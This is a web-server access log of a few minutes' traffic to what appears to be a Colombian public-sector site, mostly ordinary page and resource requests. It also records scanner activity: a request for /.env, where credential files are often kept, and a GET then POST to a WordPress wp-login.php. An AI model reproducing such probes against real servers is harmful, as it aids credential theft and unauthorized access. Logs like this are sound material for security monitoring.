201.245.192.253 - - [28/Dec/2022:07:57:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:07:57:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
173.252.83.18 - - [28/Dec/2022:07:57:55 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [28/Dec/2022:07:56:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
109.237.97.180 - - [28/Dec/2022:07:58:27 -0500] "GET /.env HTTP/1.1" 404 1018
109.237.97.180 - - [28/Dec/2022:07:58:27 -0500] "\x16\x03\x01\x01H\x01" 400 226
201.245.192.253 - - [28/Dec/2022:07:58:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:07:57:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
186.102.8.137 - - [28/Dec/2022:08:01:11 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+fnUTmOVzmRi+04oHsbrU3Pmq8yAVWKKKKGujttcnLcpdTzY7uYMCc&y=U2FsdGVkX19N2klIaj9ulaRx2nf0NAp/zc1+V/CD1wxPkrzizrYoqHtLTo3smjA1 HTTP/1.1" 200 30
186.102.8.137 - - [28/Dec/2022:08:01:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19n1ZCPf7uKmX8+2f9mryekCkomMTeMY4o4YKKYRIrnOcYzZ8REzhuH6seiU8aVRTNDSaQYZQwl2x7+tr8nDlXC0XUBVnNET70=&u=U2FsdGVkX1/IAJV4r00R0W1jnh8BOK38vwp23JQvt2+BX8k/7INK6RLu2YYl3XmG&y=U2FsdGVkX19N2klIaj9ulaRx2nf0NAp/zc1+V/CD1wxPkrzizrYoqHtLTo3smjA1 HTTP/1.1" 200 97
186.102.8.137 - - [28/Dec/2022:08:01:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+1SPnEgQpLzqycrtjP3XqlWv5cZs/X+uNV+Jfx1Bg3/40ppqjOr6xF+6nR2guHboyAVXQFwwJMJWMIB2jkKgApNeCTs9xkax9ERxCo0PqttagNmfXT93nnM8COxGqWYY6CbKjZSZ9XM7vky7sDSZv99QK2NuL7ReAeAhoDkusJCJO2rAmurhmYrQC2jO41iVZ2ZmZDNoNnYDd98u3F9j8kaSwvqveo4p16FdpdCXlSL/K60cIrYXrHW2WuCgR3be4BJqv9Z1gAghpLEBVhqldDUTiyvJ+f0THYyIv+SkDzLhpWhUsEWMXHft5fCeMwgTm0sZfpG9uraih6ksT/IgprwoonMg/8aXyRKo7jB5CVE3iTzVzRpYOLz/jajW11P6ZA6BwCiu3oI5SwzCzgOUUBtQ1Nd4aCtHctFbFesC68/Jf0HYSsmLM9XjMuLj/UCXJl7qYsycfDhxqL1DgxoDCMkgmL8qBZXdvRsu9jd9MO6BJdRgC4VD7Ada9rJW1vq6kiZQwl3qVspOLKzal1U4WGdoB1q3u1ujLj4TfP9pXRJ5gjgJvWG1bdEEq7LJrFosYpMp9OS3mBaFHoHppPg0yB37UnpiIBGwhSa9BX3JNWjmXqwKE15FAvjnPGmWaI33TR5MDzzKrJUGC2kyN5er6nmNM3xmYf5GhLr2rKurKFiGJaMm0qF0gp70c1PcZuX1D4Smix5nTgeMlGfVkd9+Qz4RvbQ3Y9mQAGX7TOseBEzw9aQ6FBWMSxwAf9PiWexb5w9Fe7Jx6IQ5nuVoPdlGPrRdxfWJ647w/Rryz7Y1zj6+y0T6DyZmUOEkAr8mbuHOR2CGgtMre0gVFq1/IWzBVpasnnjES0DrfrKUBVjfzCNMTIyHHHdm68/YxTp1ehsAwRxpbhhRnu4mUDTQCft9OVRxpA4y6mLbLo7CmBYxFxljQEZgoOBgHHRA4Dd+5pLB3I69cZhp6AZn4jNIcgi6IWepmTK/w9FE0Nm1/Jh+ARMs5J8s3+fLMjjZQsFKvMuYpHvvtKnTD27Dl7RP5dLCyH4j4aXremDvZZbJ9O2RKMwYAs0yrPVE0vdC2oqhxsVLYoN59A7Tdr/y2laNI6LbrmUw2iRHFS5GouVbpPJt+Cjc5SPnXmtSMjW1I+kZCCNNWyVRfGRGmV3qwXUQmTZ/78VipqS/8Xhe48RfTaWrYvezc8u8G/cEiaYgughaEioBjl9zDKYeII9tJjY46XT4pTZHSFaKaeYdeVinDNOoFhZjTR7wvNaJqIf8JIEoihUqT4BloLOkyDCvED1uh1XMMXd6fMl+auJD4RYDgTgp1Zehlo0peePav9KFmUgU3PKcn5q93zs5+FEhKyQSC7fQJas553jZ1L8j8x57EWU4UlNZEYi85vXNxaydo0ZAfgyYQRsXMeZXoQhCJcZyFjEdexVQi3IAoj74I=&u=U2FsdGVkX1/IAJV4r00R0W1jnh8BOK38vwp23JQvt2+BX8k/7INK6RLu2YYl3XmG&y=U2FsdGVkX19N2klIaj9ulaRx2nf0NAp/zc1+V/CD1wxPkrzizrYoqHtLTo3smjA1 HTTP/1.1" 200 14790
186.102.8.137 - - [28/Dec/2022:08:01:12 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1811TjaXsU7E124UYwmold4SFDPKegMJGEqVhXUpuQYHSuhlw+adndEXbkopZzF1Iic639cRiMkmVqh1uvwA0KC3f/6RBif2nyaNRw5f1dOlUkSV6aEY3LNQ7cK2tbGBaSkvi7XsfwtR3bSLmRqOANN0IZXiB954Qg6aqaeVnttQsfRjX0ZmS1d8jYxijbuXpYwEEzyDdR7EOn2SnUFvBAVkgvKmbaLeBCs9LpnEU9k+zAYnuVale/Jas8tambQXSLCgj3G6pDyuAm4NqmMpQWg3vYCl5vnPOpqSwT8LufrUJ30nxXHa+aniKOxhSLAUpeG2qtAnHUZ/z7aulGf47ZTZLBJyfnUTX0=&u=U2FsdGVkX1/IAJV4r00R0W1jnh8BOK38vwp23JQvt2+BX8k/7INK6RLu2YYl3XmG&y=U2FsdGVkX19N2klIaj9ulaRx2nf0NAp/zc1+V/CD1wxPkrzizrYoqHtLTo3smjA1 HTTP/1.1" 200 196
186.102.8.137 - - [28/Dec/2022:08:01:12 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+fnUTmOVzmRi+04oHsbrU3Pmq8yAVWKKKKGujttcnLcpdTzY7uYMCc HTTP/1.1" 200 31032
216.245.221.92 - - [28/Dec/2022:08:01:33 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.105 - - [28/Dec/2022:08:01:35 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [28/Dec/2022:08:01:36 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [28/Dec/2022:08:02:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 41706
201.245.192.253 - - [28/Dec/2022:08:02:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
